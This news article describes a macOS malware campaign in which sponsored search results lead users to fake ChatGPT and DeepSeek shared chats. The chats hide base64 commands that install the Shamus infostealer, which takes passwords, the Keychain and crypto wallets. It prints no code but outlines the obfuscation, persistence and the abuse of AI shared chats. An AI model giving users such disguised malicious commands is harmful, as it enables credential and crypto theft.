Hackers are leveraging LLM shared chats to steal passwords and crypto, a new malware campaign has emerged that exploits legitimate AI platforms to deliver malicious code directly to unsuspecting users. Threat actors are using sponsored Google search results to redirect users searching for common macOS troubleshooting tips, such as “how to clear storage on Mac,” to fake ChatGPT and DeepSeek shared chat links. These shared chats appear to provide helpful system instructions but actually contain hidden malicious commands designed to compromise the target system.
The attack begins when users encounter a seemingly legitimate shared chat that provides step-by-step instructions for clearing storage space on their Mac. However, embedded within these instructions are base64-encoded commands that, when executed, download and run a sophisticated multi-stage malware program. This technique is clever because it bypasses the safety checks these AI platforms typically employ, allowing attackers to deliver targeted, malicious instructions directly to users through official channels.
Sophisticated Tactic for Password and Crypto Theft
The infection process starts with a bash script that prompts users to enter their system password, masquerading as a credential verification prompt. Once captured, the malware uses this password to escalate privileges and download the main malware binary from attacker-controlled servers. Breakpoint Security security analysts identified this sample as Shamus, a known information stealer and cryptocurrency thief that has been widely documented in security communities. This sophisticated tactic demonstrates a concerning evolution in how threat actors are attempting to bypass traditional security measures.
The malware’s sophistication lies in its multi-layered encoding and detection evasion tactics. It uses arithmetic and XOR encoding combined with a custom 6-bit decoder to hide its malicious code from analysis tools. This obfuscation makes it extremely difficult for security researchers to identify its true functionality through static analysis alone. Once installed, the malware establishes persistent system access by creating a LaunchDaemon that runs automatically at startup, ensuring continued compromised access even after system restarts.
The core functionality of the Shamus malware targets sensitive data across multiple categories. This includes browser cookies and passwords from Chrome, Firefox, and 12 other Chromium-based browsers. The threat extends to cryptocurrency wallets, with the malware specifically targeting 15 different desktop and hardware wallet applications, including prominent names like Ledger Live, Trezor Suite, Exodus, Coinomi, Electrum, and Bitcoin Core. This broad targeting highlights the attackers’ intent to maximize financial gain from compromised systems.
Additionally, the malware is reported to steal the entire macOS Keychain database, which stores a wide range of user credentials and sensitive information. It also extracts Telegram session data, VPN profiles, and files from the desktop and Documents folders, further compromising user privacy and security. After collection, all stolen data is compressed and transmitted to the attacker’s command-and-control servers using encrypted communications, making detection of outbound data exfiltration more challenging.
This campaign represents a sophisticated evolution in malware distribution, demonstrating how threat actors continue to find new ways to bypass security measures and compromise user systems through seemingly innocuous AI interactions. The use of AI-shared chats and sponsored search results underscores the need for increased vigilance and critical evaluation of online information, especially when dealing with system-level instructions or troubleshooting. The ongoing development of such sophisticated attack vectors indicates a persistent threat landscape.
Security researchers are urging users to exercise extreme caution when clicking on sponsored search results and to verify the legitimacy of AI-generated content before executing any commands or providing personal information. While AI platforms are continuously improving their security protocols, threat actors remain adaptive, constantly seeking new avenues to exploit. Vigilance and robust cybersecurity practices are more critical than ever in this evolving digital environment.